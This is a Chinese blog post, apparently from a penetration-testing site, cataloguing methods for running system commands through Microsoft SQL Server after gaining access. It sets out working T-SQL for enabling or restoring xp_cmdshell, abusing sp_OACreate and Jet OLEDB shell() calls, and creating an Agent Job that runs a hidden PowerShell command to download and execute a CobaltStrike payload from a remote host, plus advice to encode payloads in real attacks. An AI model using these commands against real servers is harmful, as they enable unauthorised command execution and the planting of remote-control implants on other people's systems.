zoukankan      html  css  js  c++  java

  • MSSQL执行命令总结

    方法一:xp_cmdshell 

    exec master..xp_cmdshell "whoami"默认执行是关闭

    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

    将1修改为0则为关闭

    xp_cmdshell 被删除可采用xplog70.dll恢复

    Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\xplog70.dll'

    方法二:SP_OACREATE

    xp_cmdshell 删除以后,可以使用SP_OACreate。

    EXEC sp_configure 'show advanced options', 1;   

    RECONFIGURE WITH OVERRIDE;   

    EXEC sp_configure 'Ole Automation Procedures', 1;   

    RECONFIGURE WITH OVERRIDE;   

    EXEC sp_configure 'show advanced options', 0;

    执行[此方法无回显]

    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c whoami >d:\temp\1.txt'

    方法三:通过沙盒执行命令

    开启沙盒

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1

     

    利用jet.oledb执行命令

    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasdnary.mdb','select shell("whoami")')

    select * from openrowset('microsoft.jet.oledb.4.0',';database=iasias.mdb','select shell("CMD命令")')

    但是,当 c:WindowsSystem32iasdnary.mdb 或 c:WindowsSystem32iasias.mdb 被删除时,命令就会无效了.

    所以利用以下语句创建一个数据库:(数据库名SysSetup.xml,后缀.xml是自定义,不影响使用.)

    declare @hr int

    declare @object int;declare @property int

    exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT

    exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysSetup.xml'

    然后再利用jet.oledb调用SysSetup.xml执行系统命令:

    select * from openrowset('microsoft.jet.oledb.4.0',';database=SysSetup.xml','select shell("CMD命令")')

    方法四:通过Agent Job执行命令

    修改开启Ageent Job,执行无回显CobaltStrike生成powershell上线

    USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.214.129:80/a''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';

     

     

    实战当中需要对payload进行全编码防止编码错误导致失败

    参考链接:

    https://www.anquanke.com/post/id/84646

    https://www.4hou.com/technology/3338.html

    https://www.cnblogs.com/mujj/articles/2043853.html
  • 相关阅读:
    WPF FAQ (from Syncfusion)
    父窗口与子窗口的层次关系
    [WPF疑难]如何禁用WPF窗口的系统菜单(SystemMenu)
    【讨论】不得不重视的问题:信息太多!信息太杂!
    javaScript系列 [08]javaScript和JSON (进阶)
    javaScript系列 [11]Canvas绘图(路径)
    javaScript系列 [10]Canvas绘图(基础)
    Hexo + Github搭建个人博客
    javaScript系列 [07]日期类型和计时器
    javaScript系列 [09]javaScript和JSON (拓展)
  • 原文地址:https://www.cnblogs.com/websecyw/p/11016974.html
Copyright © 2011-2022 走看看